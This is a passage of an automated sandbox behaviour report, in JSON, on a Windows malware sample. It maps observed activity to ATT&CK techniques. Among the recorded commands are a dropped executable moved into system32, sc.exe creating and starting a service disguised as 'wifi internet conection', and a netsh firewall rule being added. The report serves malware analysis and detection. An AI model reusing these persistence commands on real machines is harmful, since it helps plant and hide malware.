api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004136)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004136)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004136)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00006040)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00006040)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006040)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006040)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006040)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006040)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004252)\n \"mpvpepag.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004252)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHWFP.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004380)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004380)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00002572)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00002572)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002572)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002572)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002572)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778D0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778D0000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778D0000\n \"mpvpepag.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778D0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778D0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 778D0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"mpvpepag.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"mpvpepag.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"cmd.exe\" (UID: 00000000-00005828) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"cmd.exe\" (UID: 00000000-00005828) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"mpvpepag.exe\" (UID: 00000000-00004252) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"mpvpepag.exe\" (UID: 00000000-00004252) was launched with missing environment variables: \"LOGONSERVER, USERDNSDOMAIN, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00004380) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", USERDNSDOMAIN=\"%OSUSER%-PC\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00004380) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"svchost.exe\" (UID: 00000000-00002572) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, USERDNSDOMAIN, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00002572) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\cygqxrtx\\\\\" (UID: 00000000-00005828)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\mpvpepag.exe\" %WINDIR%\\\\system32\\\\cygqxrtx\\\\\" (UID: 00000000-00005824)\n Spawned process \"sc.exe\" with commandline \"create cygqxrtx binPath= \"%WINDIR%\\\\system32\\\\cygqxrtx\\\\mpvpepag ...\" (UID: 00000000-00004136), Spawned process \"sc.exe\" with commandline \"description cygqxrtx \"wifi internet conection\"\" (UID: 00000000-00006064), Spawned process \"sc.exe\" with commandline \"start cygqxrtx\" (UID: 00000000-00006040), Spawned process \"mpvpepag.exe\" with commandline \"/d\"C:\\\\6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa328 ...\" (UID: 00000000-00004252)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00004380), Spawned process \"svchost.exe\" (UID: 00000000-00002572)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\cygqxrtx\\\\\" (UID: 00000000-00005828)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\mpvpepag.exe\" %WINDIR%\\\\system32\\\\cygqxrtx\\\\\" (UID: 00000000-00005824)\n Spawned process \"sc.exe\" with commandline \"create cygqxrtx binPath= \"%WINDIR%\\\\system32\\\\cygqxrtx\\\\mpvpepag ...\" (UID: 00000000-00004136), Spawned process \"sc.exe\" with commandline \"description cygqxrtx \"wifi internet conection\"\" (UID: 00000000-00006064), Spawned process \"sc.exe\" with commandline \"start cygqxrtx\" (UID: 00000000-00006040), Spawned process \"mpvpepag.exe\" with commandline \"/d\"C:\\\\6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa328 ...\" (UID: 00000000-00004252)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00004380), Spawned process \"svchost.exe\" (UID: 00000000-00002572)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"mpvpepag.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"mpvpepag.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"mpvpepag.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67EE5469.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67EE5469.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67EE5469.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67EE5469.bin\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab\" was detected as \"VC8 -> Microsoft Corporation\"\n \"mpvpepag.exe\" was detected as \"VC8 -> Microsoft Corporation\"\n \"DISMHOST.EXE.67EE5469.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"mpvpepag.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\mpvpepag.exe]- [targetUID: 00000000-00005780]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"mpvpepag.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" reads file \"c:\\6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\RPC\"; Key: \"\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" trying to access non-existent file 